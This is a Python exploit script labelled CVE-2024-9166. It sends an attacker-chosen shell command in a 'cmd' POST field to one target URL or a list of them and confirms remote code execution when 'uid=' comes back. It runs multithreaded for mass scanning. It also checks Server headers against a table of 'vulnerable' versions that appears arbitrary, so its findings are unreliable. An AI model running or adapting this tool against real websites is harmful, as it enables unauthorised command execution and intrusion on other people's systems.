CVE-2024-9166.py

import requests
from bs4 import BeautifulSoup
import re
import argparse
from concurrent.futures import ThreadPoolExecutor, as_completed
import logging
import json
from packaging import version

# ANSI color codes for terminal output
ANSI_COLOR_CODE = {
    'bright_yellow': '\033[93m',
    'bold': '\033[1m',
    'green': '\033[32m',
    'reset': '\033[0m',
    'red': '\033[31m',
    'bg_bright_white': '\033[107m',
    'cyan': '\033[36m'
}

# Banner display
def show_banner():
    banner = r"""
  ######   ##         ##  ########               #####     ######     #####     #     #                    #####     ###    ###     ###
 ##    ##   ##       ##   ##                    #     #   #      #   #     #    #     #                   #     #     #    #   #   #   #
 ##          ##     ##    ##                          #   #      #         #    #     #                   #     #     #    #       #
 ##           ##   ##     ######   ###########       #    #      #        #     #######   ###########      #####      #    ####    ####
 ##            ## ##      ##       ###########      #     #      #       #            #   ###########         #       #    #   #   #   #
 ##    ##       # #       ##                       #      #      #      #             #                      #        #    #   #   #   #
  ######         #        ########              #######    ######    #######          #                   ###        ###    ###     ###
"""
    print(banner)

# Setup logging
def setup_logger(log_file):
    logging.basicConfig(filename=log_file, filemode='a', format='%(asctime)s - %(message)s', level=logging.INFO)

# Exploit website for the specific CVE
def exploit_website(url, exploit_command, expected_content='uid=', headers=None):
    exploit_payload = {'cmd': exploit_command}
    try:
        response = requests.post(url, data=exploit_payload, headers=headers, timeout=10, verify=True)
        if response.status_code == 200 and expected_content in response.text:
            logging.info(f"Exploit successful on {url}: {response.text}")
            print(f"{ANSI_COLOR_CODE['bright_yellow']}[!]{ANSI_COLOR_CODE['reset']} {ANSI_COLOR_CODE['bold']}{ANSI_COLOR_CODE['green']}Exploit successful on {url}{ANSI_COLOR_CODE['reset']}")
        else:
            logging.info(f"Exploit failed on {url}")
            print(f"{ANSI_COLOR_CODE['red']}[-] Exploit failed on {url} or site not vulnerable.{ANSI_COLOR_CODE['reset']}")
    except Exception as e:
        logging.error(f"Exploit failed on {url}: {e}")
        print(f"{ANSI_COLOR_CODE['bg_bright_white']}[!]{ANSI_COLOR_CODE['reset']} {ANSI_COLOR_CODE['cyan']}Exploit failed on {url}: {e}{ANSI_COLOR_CODE['reset']}")

# Check headers for vulnerable software versions
def check_headers(url, headers=None):
    try:
        response = requests.head(url, headers=headers, timeout=10, verify=True)
        server_header = response.headers.get('Server', '')

        vulnerable_software_table = {
            'Apache': '2.4.49',
            'nginx': '1.18.0',
            'Microsoft-IIS': '10.0',
            'PHP': '7.4.3',
            'OpenSSL': '1.0.2u',
            'Tomcat': '9.0.31'
        }

        for software, vulnerable_version in vulnerable_software_table.items():
            if software in server_header:
                server_version = re.search(rf"{software}/([\d\.]+)", server_header)
                if server_version:
                    server_version = server_version.group(1)
                    if version.parse(server_version) <= version.parse(vulnerable_version):
                        logging.info(f"[!] Vulnerable {software} version found on {url}: {server_version}")
                        print(f"[!] Vulnerable {software} version found on {url}: {server_version}")
                        return
        logging.info(f"[-] No vulnerable software found in headers on {url}")
        print(f"[-] No vulnerable server version found in headers on {url}")
    except Exception as e:
        logging.error(f"Failed to retrieve headers from {url}: {e}")
        print(f"[!] Failed to retrieve headers from {url}: {e}")

# Scan a website for vulnerabilities
def scan_website(url, exploit_command, expected_content='uid=', headers=None):
    try:
        response = requests.get(url, headers=headers, timeout=10, verify=True)
        if response.status_code == 200:
            soup = BeautifulSoup(response.text, 'html.parser')
            if re.search(r'getcommand', soup.text, re.IGNORECASE):
                logging.info(f"[!] Vulnerable pattern found on {url}")
                print(f"[!] Vulnerable pattern found on {url}")
            else:
                logging.info(f"[-] No vulnerable pattern found on {url}")
                print(f"[-] No vulnerable pattern found on {url}")

            check_headers(url, headers)
            exploit_website(url, exploit_command, expected_content, headers)
        else:
            logging.info(f"[!] Could not access {url} - Status Code: {response.status_code}")
            print(f"[!] Could not access {url} - Status Code: {response.status_code}")
    except Exception as e:
        logging.error(f"Error scanning {url}: {e}")
        print(f"[!] Error scanning {url}: {e}")

# Scan websites from a file using threading
def scan_from_file(file_path, exploit_command, expected_content='uid=', headers=None, max_threads=5):
    with open(file_path, 'r') as file:
        urls = [line.strip() for line in file.readlines()]

    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        futures = {executor.submit(scan_website, url, exploit_command, expected_content, headers): url for url in urls}
        for future in as_completed(futures):
            url = futures[future]
            try:
                future.result()
            except Exception as e:
                logging.error(f"Error scanning {url}: {e}")
                print(f"[!] Error scanning {url}: {e}")

# Main function for argument parsing
def main():
    parser = argparse.ArgumentParser(description='Scan websites for CVE-2024-9166 vulnerability.')
    parser.add_argument('-u', '--url', help='Single URL to scan.')
    parser.add_argument('-f', '--file', help='File containing list of URLs to scan.')
    parser.add_argument('-l', '--logfile', default='scan_log.txt', help='Log file to store scan results.')
    parser.add_argument('--headers', help='Custom headers in JSON format (e.g., \'{"User-Agent": "Custom-Agent"}\').', type=json.loads)
    parser.add_argument('--exploit-command', default='id', help='Custom command to test the exploit (default: "id").')
    parser.add_argument('--expected-content', default='uid=', help='Expected content to confirm successful exploitation (default: "uid=").')
    parser.add_argument('--threads', type=int, default=5, help='Number of threads for scanning multiple URLs.')

    args = parser.parse_args()
    setup_logger(args.logfile)

    if args.url:
        scan_website(args.url, args.exploit_command, expected_content=args.expected_content, headers=args.headers)
    elif args.file:
        scan_from_file(args.file, args.exploit_command, expected_content=args.expected_content, headers=args.headers, max_threads=args.threads)
    else:
        print("Please provide a URL or a file with URLs to scan.")

if __name__ == "__main__":
    show_banner()
    main()